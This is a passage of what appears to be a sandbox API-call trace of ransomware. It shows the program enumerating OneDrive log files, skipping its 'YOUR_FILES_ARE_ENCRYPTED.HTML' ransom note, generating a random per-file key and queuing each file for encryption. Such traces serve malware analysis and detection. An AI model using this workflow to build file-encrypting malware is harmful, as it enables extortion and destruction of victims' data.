cFileName="2021-02-18_130550_ac-d08.log", cAlternateFileName="2021-0~1.LOG")) returned 1 [0114.122] StrStrIW (lpFirst="2021-02-18_130550_ac-d08.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.122] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log") returned 98 [0114.122] PathFindExtensionW (pszPath="2021-02-18_130550_ac-d08.log") returned=".log" [0114.122] lstrlenW (lpString=".log") returned 4 [0114.122] PathFindExtensionW (pszPath="2021-02-18_130550_ac-d08.log") returned=".log" [0114.122] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\2021-02-18_130550_ac-d08.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0114.123] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=8366) returned 1 [0114.123] GetProcessHeap () returned 0x600000 [0114.123] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0114.125] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="17") returned 2 [0114.125] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="56") returned 2 [0114.125] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="23") returned 2 [0114.125] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="E5") returned 2 [0114.125] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="3E") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="6C") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="67") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="44") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="1A") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="5B") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="FC") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="A6") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="87") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="92") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="A8") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="DE") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3B") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="18") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="CA") returned 2 [0114.125] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="87") returned 2 [0114.125] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="C8") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="F3") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="6D") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="88") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="BB") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="58") returned 2 [0114.125] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="2C") returned 2 [0114.125] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="F1") returned 2 [0114.125] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="1E") returned 2 [0114.125] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="4B") returned 2 [0114.125] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="1F") returned 2 [0114.125] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="11") returned 2 [0114.126] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_ac-d08.log" [0114.126] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.126] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0114.126] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8805a3a7, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x8805a3a7, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x98355904, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x234b2, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install-PerUser_2021-02-11_125336_9c0-9f8.log", cAlternateFileName="INSTAL~2.LOG")) returned 1 [0114.126] StrStrIW (lpFirst="Install-PerUser_2021-02-11_125336_9c0-9f8.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.126] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log") returned 115 [0114.126] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_125336_9c0-9f8.log") returned=".log" [0114.126] lstrlenW (lpString=".log") returned 4 [0114.126] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_125336_9c0-9f8.log") returned=".log" [0114.126] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install-peruser_2021-02-11_125336_9c0-9f8.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0114.126] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=144562) returned 1 [0114.127] GetProcessHeap () returned 0x600000 [0114.127] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0114.129] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="64") returned 2 [0114.129] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="CD") returned 2 [0114.129] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="F4") returned 2 [0114.129] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="A9") returned 2 [0114.129] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="1C") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="80") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="DA") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="66") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="23") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="32") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="FF") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="0C") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="D6") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="CF") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="A2") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="4D") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="75") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="3B") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="32") returned 2 [0114.129] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="0C") returned 2 [0114.129] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="06") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="64") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="51") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="14") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="71") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="A5") returned 2 [0114.129] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="FE") returned 2 [0114.130] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="61") returned 2 [0114.130] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="58") returned 2 [0114.130] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="AB") returned 2 [0114.130] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="BB") returned 2 [0114.130] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="66") returned 2 [0114.130] lstrcpyW (in: lpString1=0x6703ec, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_125336_9c0-9f8.log" [0114.130] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x660338, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.130] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x660338, lpOverlapped=0x660338) returned 1 [0114.130] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c38b0, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x137c38b0, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x2b646bb1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2745e, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install-PerUser_2021-02-11_131859_f38-f3c.log", cAlternateFileName="INSTAL~4.LOG")) returned 1 [0114.130] StrStrIW (lpFirst="Install-PerUser_2021-02-11_131859_f38-f3c.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.130] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log") returned 115 [0114.130] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_131859_f38-f3c.log") returned=".log" [0114.130] lstrlenW (lpString=".log") returned 4 [0114.130] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_131859_f38-f3c.log") returned=".log" [0114.130] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install-peruser_2021-02-11_131859_f38-f3c.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0114.131] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=160862) returned 1 [0114.131] GetProcessHeap () returned 0x600000 [0114.131] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0114.133] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="A6") returned 2 [0114.133] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="48") returned 2 [0114.133] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="51") returned 2 [0114.133] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="B6") returned 2 [0114.133] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="0F") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="24") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="CB") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="37") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="2E") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="FF") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="83") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="9C") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="27") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="0B") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="7D") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="2A") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="BE") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="01") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="38") returned 2 [0114.133] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="2A") returned 2 [0114.133] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="96") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="1A") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="AE") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="94") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="22") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="5B") returned 2 [0114.133] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="B4") returned 2 [0114.133] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="87") returned 2 [0114.133] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="C9") returned 2 [0114.133] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="E6") returned 2 [0114.133] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="04") returned 2 [0114.133] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="31") returned 2 [0114.134] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_131859_f38-f3c.log" [0114.134] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.134] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0114.134] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xced0b146, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xced0b146, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1c297983, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x36366, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install-PerUser_2021-02-11_132413_e60-e64.log", cAlternateFileName="IN9480~1.LOG")) returned 1 [0114.134] StrStrIW (lpFirst="Install-PerUser_2021-02-11_132413_e60-e64.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.134] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log") returned 115 [0114.134] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_132413_e60-e64.log") returned=".log" [0114.134] lstrlenW (lpString=".log") returned 4 [0114.134] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_132413_e60-e64.log") returned=".log" [0114.134] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.134] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install-peruser_2021-02-11_132413_e60-e64.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0114.135] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=222054) returned 1 [0114.135] GetProcessHeap () returned 0x600000 [0114.135] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0114.138] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="A5") returned 2 [0114.138] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="3A") returned 2 [0114.139] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="9E") returned 2 [0114.139] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="10") returned 2 [0114.139] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="22") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="CC") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="98") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="0B") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="8E") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="41") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="27") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="E1") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="E2") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="4A") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="3E") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="D8") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="D3") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="D2") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="97") returned 2 [0114.139] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="40") returned 2 [0114.139] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="43") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="38") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="D8") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="71") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="7F") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="3F") returned 2 [0114.139] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="28") returned 2 [0114.139] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="A2") returned 2 [0114.139] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="AD") returned 2 [0114.139] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="06") returned 2 [0114.139] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="45") returned 2 [0114.139] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="18") returned 2 [0114.140] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132413_e60-e64.log" [0114.140] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0114.140] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0114.140] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb4b96d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4bb4b96d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6b71df77, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x390a2, dwReserved0=0x640128, dwReserved1=0x385835e, cFileName="Install-PerUser_2021-02-11_132743_ca8-cac.log", cAlternateFileName="IN2849~1.LOG")) returned 1 [0114.140] StrStrIW (lpFirst="Install-PerUser_2021-02-11_132743_ca8-cac.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.140] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log") returned 115 [0114.140] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_132743_ca8-cac.log") returned=".log" [0114.140] lstrlenW (lpString=".log") returned 4 [0114.140] PathFindExtensionW (pszPath="Install-PerUser_2021-02-11_132743_ca8-cac.log") returned=".log" [0114.140] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\setup\\logs\\install-peruser_2021-02-11_132743_ca8-cac.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0114.141] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=233634) returned 1 [0114.141] GetProcessHeap () returned 0x600000 [0114.141] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0114.143] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="66") returned 2 [0114.143] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="C9") returned 2 [0114.143] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="78") returned 2 [0114.143] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="63") returned 2 [0114.143] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="36") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="C3") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="FE") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="F0") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="D4") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="9C") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="F2") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="D5") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="3E") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="F7") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="21") returned 2 [0114.143] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="D3") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="A8") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="E9") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="D6") returned 2 [0114.144] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="11") returned 2 [0114.144] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="E6") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="13") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="46") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="94") returned 2 [0114.144] wsprintfW (in: param_1=0x19ddf6, 